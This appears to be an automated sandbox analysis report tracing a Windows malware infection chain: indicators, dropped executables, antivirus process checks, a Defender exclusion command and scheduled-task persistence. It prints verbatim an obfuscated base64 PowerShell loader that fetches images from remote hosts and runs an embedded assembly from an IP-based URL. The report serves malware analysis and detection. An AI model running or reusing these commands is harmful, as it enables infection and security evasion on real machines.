Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4356 schtasks.exe 2164 schtasks.exe 3904 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3172 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 3172 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 4236 rapes.exe 4236 rapes.exe 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 2892 PfOHmro.exe 2892 PfOHmro.exe 2892 PfOHmro.exe 2628 powershell.exe 2628 powershell.exe 2628 powershell.exe 4660 powershell.exe 4660 powershell.exe 4660 powershell.exe 3780 powershell.exe 3780 powershell.exe 3780 powershell.exe 2064 rapes.exe 2064 rapes.exe 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2892 PfOHmro.exe Token: SeDebugPrivilege 4048 tasklist.exe Token: SeDebugPrivilege 1772 tasklist.exe Token: SeDebugPrivilege 2628 powershell.exe Token: SeDebugPrivilege 4660 powershell.exe Token: SeDebugPrivilege 3780 powershell.exe Token: SeDebugPrivilege 2384 RegAsm.exe Token: SeDebugPrivilege 2488 taskkill.exe Token: SeDebugPrivilege 2808 taskkill.exe Token: SeDebugPrivilege 872 taskkill.exe Token: SeDebugPrivilege 2316 taskkill.exe Token: SeDebugPrivilege 4592 taskkill.exe Token: SeDebugPrivilege 4852 firefox.exe Token: SeDebugPrivilege 4852 firefox.exe Token: SeDebugPrivilege 4032 c04f336cff.exe Token: SeDebugPrivilege 5784 HHPgDSI.exe Token: SeDebugPrivilege 1724 HHPgDSI.exe Token: SeDebugPrivilege 1164 powershell.exe Token: SeDebugPrivilege 5840 powershell.exe Token: SeDebugPrivilege 2836 tasklist.exe Token: SeDebugPrivilege 804 tasklist.exe Token: SeDebugPrivilege 4408 tasklist.exe Token: SeDebugPrivilege 3132 tasklist.exe Token: SeDebugPrivilege 6308 PfOHmro.exe Token: SeDebugPrivilege 7504 mIrI3a9.exe Token: SeDebugPrivilege 7804 powershell.exe Token: SeDebugPrivilege 7384 RegAsm.exe Token: SeDebugPrivilege 7832 a.exe Token: SeDebugPrivilege 8772 powershell.exe Token: SeIncreaseQuotaPrivilege 7384 RegAsm.exe Token: SeSecurityPrivilege 7384 RegAsm.exe Token: SeTakeOwnershipPrivilege 7384 RegAsm.exe Token: SeLoadDriverPrivilege 7384 RegAsm.exe Token: SeSystemProfilePrivilege 7384 RegAsm.exe Token: SeSystemtimePrivilege 7384 RegAsm.exe Token: SeProfSingleProcessPrivilege 7384 RegAsm.exe Token: SeIncBasePriorityPrivilege 7384 RegAsm.exe Token: SeCreatePagefilePrivilege 7384 RegAsm.exe Token: SeBackupPrivilege 7384 RegAsm.exe Token: SeRestorePrivilege 7384 RegAsm.exe Token: SeShutdownPrivilege 7384 RegAsm.exe Token: SeDebugPrivilege 7384 RegAsm.exe Token: SeSystemEnvironmentPrivilege 7384 RegAsm.exe Token: SeRemoteShutdownPrivilege 7384 RegAsm.exe Token: SeUndockPrivilege 7384 RegAsm.exe Token: SeManageVolumePrivilege 7384 RegAsm.exe Token: 33 7384 RegAsm.exe Token: 34 7384 RegAsm.exe Token: 35 7384 RegAsm.exe Token: 36 7384 RegAsm.exe Token: SeIncreaseQuotaPrivilege 7384 RegAsm.exe Token: SeSecurityPrivilege 7384 RegAsm.exe Token: SeTakeOwnershipPrivilege 7384 RegAsm.exe Token: SeLoadDriverPrivilege 7384 RegAsm.exe Token: SeSystemProfilePrivilege 7384 RegAsm.exe Token: SeSystemtimePrivilege 7384 RegAsm.exe Token: SeProfSingleProcessPrivilege 7384 RegAsm.exe Token: SeIncBasePriorityPrivilege 7384 RegAsm.exe Token: SeCreatePagefilePrivilege 7384 RegAsm.exe Token: SeBackupPrivilege 7384 RegAsm.exe Token: SeRestorePrivilege 7384 RegAsm.exe Token: SeShutdownPrivilege 7384 RegAsm.exe Token: SeDebugPrivilege 7384 RegAsm.exe Token: SeSystemEnvironmentPrivilege 7384 RegAsm.exe -
Suspicious use of FindShellTrayWindow 42 IoCs
pid Process 3172 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 5108 Occupation.com 5108 Occupation.com 5108 Occupation.com 5664 Seat.com 5664 Seat.com 5664 Seat.com -
Suspicious use of SendNotifyMessage 40 IoCs
pid Process 4496 Occupation.com 4496 Occupation.com 4496 Occupation.com 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4852 firefox.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 4964 2d911a7926.exe 5108 Occupation.com 5108 Occupation.com 5108 Occupation.com 5664 Seat.com 5664 Seat.com 5664 Seat.com -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4852 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3172 wrote to memory of 4236 3172 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 89 PID 3172 wrote to memory of 4236 3172 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 89 PID 3172 wrote to memory of 4236 3172 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 89 PID 4236 wrote to memory of 664 4236 rapes.exe 94 PID 4236 wrote to memory of 664 4236 rapes.exe 94 PID 4236 wrote to memory of 664 4236 rapes.exe 94 PID 664 wrote to memory of 2892 664 PfOHmro.exe 95 PID 664 wrote to memory of 2892 664 PfOHmro.exe 95 PID 664 wrote to memory of 2892 664 PfOHmro.exe 95 PID 664 wrote to memory of 2892 664 PfOHmro.exe 95 PID 664 wrote to memory of 2892 664 PfOHmro.exe 95 PID 664 wrote to memory of 2892 664 PfOHmro.exe 95 PID 664 wrote to memory of 2892 664 PfOHmro.exe 95 PID 664 wrote to memory of 2892 664 PfOHmro.exe 95 PID 4236 wrote to memory of 4556 4236 rapes.exe 103 PID 4236 wrote to memory of 4556 4236 rapes.exe 103 PID 4236 wrote to memory of 4556 4236 rapes.exe 103 PID 4556 wrote to memory of 3336 4556 ReK7Ewx.exe 104 PID 4556 wrote to memory of 3336 4556 ReK7Ewx.exe 104 PID 4556 wrote to memory of 3336 4556 ReK7Ewx.exe 104 PID 3336 wrote to memory of 5028 3336 cmd.exe 106 PID 3336 wrote to memory of 5028 3336 cmd.exe 106 PID 3336 wrote to memory of 5028 3336 cmd.exe 106 PID 3336 wrote to memory of 4048 3336 cmd.exe 107 PID 3336 wrote to memory of 4048 3336 cmd.exe 107 PID 3336 wrote to memory of 4048 3336 cmd.exe 107 PID 3336 wrote to memory of 3008 3336 cmd.exe 108 PID 3336 wrote to memory of 3008 3336 cmd.exe 108 PID 3336 wrote to memory of 3008 3336 cmd.exe 108 PID 3336 wrote to memory of 1772 3336 cmd.exe 109 PID 3336 wrote to memory of 1772 3336 cmd.exe 109 PID 3336 wrote to memory of 1772 3336 cmd.exe 109 PID 3336 wrote to memory of 5100 3336 cmd.exe 110 PID 3336 wrote to memory of 5100 3336 cmd.exe 110 PID 3336 wrote to memory of 5100 3336 cmd.exe 110 PID 3336 wrote to memory of 2740 3336 cmd.exe 111 PID 3336 wrote to memory of 2740 3336 cmd.exe 111 PID 3336 wrote to memory of 2740 3336 cmd.exe 111 PID 3336 wrote to memory of 1140 3336 cmd.exe 112 PID 3336 wrote to memory of 1140 3336 cmd.exe 112 PID 3336 wrote to memory of 1140 3336 cmd.exe 112 PID 3336 wrote to memory of 4596 3336 cmd.exe 113 PID 3336 wrote to memory of 4596 3336 cmd.exe 113 PID 3336 wrote to memory of 4596 3336 cmd.exe 113 PID 3336 wrote to memory of 3904 3336 cmd.exe 114 PID 3336 wrote to memory of 3904 3336 cmd.exe 114 PID 3336 wrote to memory of 3904 3336 cmd.exe 114 PID 3336 wrote to memory of 5016 3336 cmd.exe 115 PID 3336 wrote to memory of 5016 3336 cmd.exe 115 PID 3336 wrote to memory of 5016 3336 cmd.exe 115 PID 3336 wrote to memory of 4496 3336 cmd.exe 116 PID 3336 wrote to memory of 4496 3336 cmd.exe 116 PID 3336 wrote to memory of 4496 3336 cmd.exe 116 PID 3336 wrote to memory of 3272 3336 cmd.exe 117 PID 3336 wrote to memory of 3272 3336 cmd.exe 117 PID 3336 wrote to memory of 3272 3336 cmd.exe 117 PID 4496 wrote to memory of 3180 4496 Occupation.com 118 PID 4496 wrote to memory of 3180 4496 Occupation.com 118 PID 4496 wrote to memory of 3180 4496 Occupation.com 118 PID 4496 wrote to memory of 3504 4496 Occupation.com 120 PID 4496 wrote to memory of 3504 4496 Occupation.com 120 PID 4496 wrote to memory of 3504 4496 Occupation.com 120 PID 3180 wrote to memory of 2164 3180 cmd.exe 122 PID 3180 wrote to memory of 2164 3180 cmd.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3440
-
C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe"C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 7885⤵
- Program crash
PID:4964
-
-
-
C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Windows\SysWOW64\expand.exeexpand Ae.msi Ae.msi.bat6⤵
- System Location Discovery: System Language Discovery
PID:5028
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵PID:3008
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"6⤵PID:5100
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7899196⤵
- System Location Discovery: System Language Discovery
PID:2740
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Deviation.msi6⤵
- System Location Discovery: System Language Discovery
PID:1140
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Brian" Challenges6⤵
- System Location Discovery: System Language Discovery
PID:4596
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com6⤵
- System Location Discovery: System Language Discovery
PID:3904
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q6⤵
- System Location Discovery: System Language Discovery
PID:5016
-
-
C:\Users\Admin\AppData\Local\Temp\789919\Occupation.comOccupation.com q6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe7⤵
- Executes dropped EXE
PID:4012
-
-
C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:3272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:4488 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
C:\Users\Admin\AppData\Local\Temp\micC4D2.tmp.exeC:\Users\Admin\AppData\Local\Temp\micC4D2.tmp.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5348
-
-
C:\Windows\SYSTEM32\cmd.execmd /C del "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"5⤵PID:4364
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:512 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67cc62a429f2f.vbs5⤵
- Checks computer location settings
- Modifies registry class
PID:3868 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"6⤵
- Checks computer location settings
PID:2816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628 -
